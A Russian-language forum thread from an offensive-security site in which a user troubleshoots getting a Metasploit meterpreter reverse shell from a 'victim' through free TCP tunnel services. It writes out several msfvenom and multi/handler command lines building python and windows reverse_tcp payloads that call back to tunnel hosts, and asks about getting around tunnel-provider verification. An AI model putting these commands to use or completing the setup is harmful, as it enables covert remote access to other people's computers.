• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Проблема с Telebit

from_localhost

Active member
29.10.2024
25
0
BIT
164
Здравствуйте, решил попробовать Telebit,
Вообщем столкнулся с проблемой что metasploit-framework через TCP туннель созданный на telebit не видит жертву
Сразу хочу сказать что в Telebit командой telebit tcp 8884 нам даётся что-то вроде `URL`
И через этот `URL` делаю payload msfvenom -p python/meterpreter_reverse_tcp lhost=telebit.cloud lport=5894 -f raw > pyload.py
В msfconsole пишу: msfconsole use exploit/multi/handler; set payload python/meterpreter_reverse_tcp; set LHOST 0.0.0.0; set LPORT 8884; run
Но при запуске payload слушатель не видит жертву

Скажу почему выбрал Telebit потому что он бесплатный, ну и всё
Ngrok - требует верификацию
Другие - Тоже требуют верификацию, так ещё и не всегда TCP туннель бесплатный
Вероятно вы сможете подсказать замену Telebit, или Ngrok
Почему не пробрасываю проты через роутер?
Пока не получается, поэтому хочу пользоваться TCP туннелями

Буду благодарен за любой комментарий
 
Последнее редактирование:
Здравствуйте, решил попробовать Telebit,
Вообщем столкнулся с проблемой что metasploit-framework через TCP туннель созданный на telebit не видит жертву
Сразу хочу сказать что в Telebit командой telebit tcp 8884 нам даётся что-то вроде `URL`
И через этот `URL` делаю payload msfvenom -p python/meterpreter_reverse_tcp lhost=telebit.cloud lport=5894 -f raw > pyload.py
В msfconsole пишу: msfconsole use exploit/multi/handler; set payload python/meterpreter_reverse_tcp; set LHOST 0.0.0.0; set LPORT 8884; run
Но при запуске payload слушатель не видит жертву

Скажу почему выбрал Telebit потому что он бесплатный, ну и всё
Ngrok - требует верификацию
Другие - Тоже требуют верификацию, так ещё и не всегда TCP туннель бесплатный
Вероятно вы сможете подсказать замену Telebit, или Ngrok
Почему не пробрасываю проты через роутер?
Пока не получается, поэтому хочу пользоваться TCP туннелями

Буду благодарен за любой комментарий

а с exe пробовал играться msfvenom -p windows/meterpreter/reverse_tcp? сессия прилетает? в виртуалке мост стоит?
 
а с exe пробовал играться msfvenom -p windows/meterpreter/reverse_tcp? сессия прилетает? в виртуалке мост стоит?
Привет, с .exe пробовал всё так-же не работает, Сессия не прилетает
Виртуалкой не пользуюсь
У меня Ноутбук с Kali Linux (MSF) и Настольный ПК, Оба подключены по WIFI
 
Привет, с .exe пробовал всё так-же не работает, Сессия не прилетает
Виртуалкой не пользуюсь
У меня Ноутбук с Kali Linux (MSF) и Настольный ПК, Оба подключены по WIFI
хз раньше с нгроком было все OK telebit не юзал!
 
Есть способы пройти верификацию в россии?
Если да, то какие?

попробуй этот сервис бесплатный

как работать c msf будет не знаю!

1.PNG
 
попробуй этот сервис бесплатный

как работать c msf будет не знаю!

Посмотреть вложение 77438
Здравствуйте, попробовал

Тоже с .exe и .py но результата не увидел
Могу подозревать что, вероятно я не то пишу в msfvenom или msfconsole
Вот что я писал:
./xTunnel tcp 8884 => tcp://tcp-free.tunnel4.com:33499
msfvenom -p python/meterpreter/reverse_tcp lhost=tcp-free.tunnel4.com lport=33499 -f raw > raw.py
msfconsole use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 8884
Результат: metasploit-framework не видит жертву

msfvenom -p windows/meterpreter/reverse_tcp lhost=tcp-free.tunnel4.com lport=33499 -f raw > raw.py
msfconsole use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 8884
Результат: metasploit-framework не видит жертву
 
Здравствуйте, попробовал

Тоже с .exe и .py но результата не увидел
Могу подозревать что, вероятно я не то пишу в msfvenom или msfconsole
Вот что я писал:
./xTunnel tcp 8884 => tcp://tcp-free.tunnel4.com:33499
msfvenom -p python/meterpreter/reverse_tcp lhost=tcp-free.tunnel4.com lport=33499 -f raw > raw.py
msfconsole use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 8884
Результат: metasploit-framework не видит жертву

msfvenom -p windows/meterpreter/reverse_tcp lhost=tcp-free.tunnel4.com lport=33499 -f raw > raw.py
msfconsole use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 8884
Результат: metasploit-framework не видит жертву
python/meterpreter/x64/reverse_tcp разрядность ставил?


по этому ману делал? замени нгорок ./xTunnel Статья - [Metasploit] устанавливаем обратное TCP соединение через ngrok

и ip узнай который выдал xtunnel и терминал не закрывай с xtunnel)

1.PNG
 
Последнее редактирование:
Зачем ты питоновскую нагрузку делаешь ?
У тебя тут OSError, конечно не работает
Мне достаточно Python-нагрузки, мне не нужны ни Windows, ни Linux-нагрузки.
Есть способ проложить туннель на питоновской нагрузке?
 
Мне достаточно Python-нагрузки, мне не нужны ни Windows, ни Linux-нагрузки.
Есть способ проложить туннель на питоновской нагрузке?
Это все замечательно, теперь тебе осталось разобраться почему она у тебя не работает
Способ есть, истина где то рядом
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!